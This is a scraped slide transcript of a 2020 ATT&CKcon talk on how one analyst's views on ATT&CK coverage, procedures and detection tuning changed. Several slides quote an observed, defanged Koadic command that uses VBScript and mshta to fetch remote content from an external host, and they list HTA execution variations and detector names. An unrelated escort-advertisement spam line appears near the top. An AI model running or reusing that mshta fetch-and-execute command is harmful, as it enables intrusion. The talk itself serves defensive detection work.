From MITRE ATT&CKcon Power Hour December 2020
By Katie Nickels, Director of Intelligence, Red Canary
Good analysts (and good human beings) change their minds based on new information. In this presentation, Katie will share how her perspectives on ATT&CK have changed since moving from ATT&CK team member to ATT&CK end-user. She will discuss how her ideas about coverage, procedures, and detection creation have evolved and why those perspectives matter. Katie will also share practical examples from observed threats to help explain the nuances of her perspectives. Attendees should expect to leave this presentation with a better understanding of how to handle challenges they’re likely to face when navigating their own ATT&CK journey.
(NEHA) Call Girls Nagpur Call Now 8250077686 Nagpur Escorts 24x7
From Theory to Practice: How My ATTACK Perspectives Have Changed
1. From Theory to Practice:
How My ATT&CKⓇ
Perspectives Have Changed
Katie Nickels
ATT&CKcon Power Hour
December 11, 2020
2. Yes, this is being
recorded. Yes, the slides
will be shared. No, I don’t
know when. Soon.
3. § Former MITRE ATT&CK Team Member (relevant)
§ SANS Certified Instructor for FOR578:
Cyber Threat Intelligence
§ Bringing context about threats to inform decisions
§ Maintaining sanity with exercise, chocolate,
containers, and holiday lightsKatie Nickels
DIRECTOR OF INTELLIGENCE
RED CANARY
@LiketheCoins
About Me
7. Tracking TTPs the MITRE way
https://attack.mitre.org/techniques/T1218/005/
Tactic: Defense Evasion
Technique/Sub-technique: Signed Binary Proxy Execution: Mshta
Procedure: Koadic can use MSHTA to serve additional payloads.[13]
10. Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Koadic used VBScript to launch mshta.exe and make an
external network connection
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").
run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
Example of tracking beyond TTPs
11. Primary Tactic: Execution
Additional Tactics
Techniques
Procedure ★
Observable
Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").run("mshta
hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors
Name Targeted to this profile?
WIN-MSHTA-CLI-URL No
WIN-MSHTA-NON-HTA No
WIN-MSHTA-INLINE-VBSCRIPT No
TA0005 Defense Evasion
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
12. What this format lets us do
§ Track detailed observables from endpoint telemetry
§ Identify where we have detection coverage (or not)
§ Use ATT&CK tactics, techniques, and sub-techniques
...but add on because it meets our needs
14. Defining coverage by confidence
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
15. The challenge of unlimited procedures
“You should also remember that each ATT&CK technique may
have many procedures for how an adversary could implement
it — and because adversaries are always changing, we can’t
know what all those procedures are in advance.”
https://medium.com/mitre-attack/how-to-be-a-savvy-attack-consumer-63e45b8e94c9
16. Katie: “There are unlimited procedures!”
§ Matt: “But are there?”
o Think of techniques like MSHTA
o Commands only have so many flags
§ We may be able to be scope some technique variations
19. Nine known variations for HTA
1. HTA can have any file name and extension
2. Specifying a URI from where HTA content is first downloaded
3. Use of scripting engines
4. Specifying protocol handlers (e.g., “vbscript”, “javascript”, “about”)
5. HTA content embedded and executed from within other file formats
6. HTA content can be executed remotely via UNC paths.
7. Remote HTA execution via COM interface (lateral movement)
8. HTA execution by double clicking or invoking with “explorer.exe foo.hta”
9. Full control over the path and filename of mshta.exe and rundll32.exe
https://redcanary.com/blog/threat-research-questions
20. Adding in variations
Defense Evasion/Execution
T1218.005 Signed Binary Proxy Execution: Mshta
Specifying protocol handler + direct download from URI
Koadic used VBScript to launch mshta.exe and make an
external network connection
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").
run("mshta hxxp[:]//8.8.8[.]8:123/12qwert",0)(window.close)
21. Mix and match the variations
Specifying
protocol handler
vbscript:
Direct download from URI
mshta hxxp[:]//8.8.8[.]8:123/
Specifying
protocol handler
jscript:
https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/TestHarnesses/T1218.005_Mshta
22. Testing known variation combinations
T1218.005
Signed Binary Proxy
Execution:
Mshta
25 tested combinations 1 technique
More granular Less granular
24. Remember that profile breakdown?
Techniques
Observable
Koadic uses VBScript to launch mshta.exe and make an external network connection.
C:Windowssystem32mshta.EXE
vbscript:CreateObject("WScript.Shell").run("mshta
hxxp[:]//8.8.8[.]8:1234/1234656qwerty",0)(window.close)
Detectors
Name Targeted to this profile?
WIN-MSHTA-CLI-URL No
WIN-MSHTA-NON-HTA No
WIN-MSHTA-INLINE-VBSCRIPT No
T1218.005 Signed Binary Proxy Execution: Mshta
T1059.005 Command and Scripting Interpreter: Visual Basic
25. Mapping coverage based on threats
Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Kovter observable 1
Lazarus observable 1
6 threat observables for Mshta 1 technique
More granular Less granular
T1218.005
Signed Binary Proxy
Execution:
Mshta
28. Koadic observable 1
Koadic observable 2
FIN7 observable 1
FIN7 observable 2
Lazarus observable 1
Diving deeper
These are okay too!
HTA test harness results Mshta threat observables
29. Expressing coverage is just tough
§ Any way you express it will have limitations
§ There’s no “right” or “wrong” way to do it
...but there may be “better” ways for your needs
§ Figure out the requirement for what you’re doing
o What are you trying to convey and achieve?
o What’s your goal of expressing the coverage?
31. § Not everything is useful for detection
§ Choosing is most of the battle
https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/
Finding “good” detection opportunities
32. § “Discovery techniques aren’t that useful for detection”
https://i.blackhat.com/USA-19/Wednesday/us-19-Nickels-MITRE-ATTACK-The-Play-At-Home-Edition.pdf
Discovery techniques
34. § “This should NEVER happen in an environment, let’s write a
detection analytic!” —Me in January 2020
§ “Here’s a hypothesis that will probably be noisy so here are five
ways to tune it when that happens.” —Me in December 2020
§ If an analytic is noisy…how can we tune it?
o Narrow it down? Use threat intelligence.
o Easily suppress on false positives?
Testing & tuning is most of the work
https://redcanary.com/blog/tuning-detectors/
36. Takeaways
§ Don’t limit yourself to just TTPs if you need to go further
§ Define detection coverage based on your requirements
§ Trial, error, and experience will help you choose what to detect
§ It’s a good thing to change your perspectives
§ Surrounding yourself with new people and new situations lets
you think differently and mature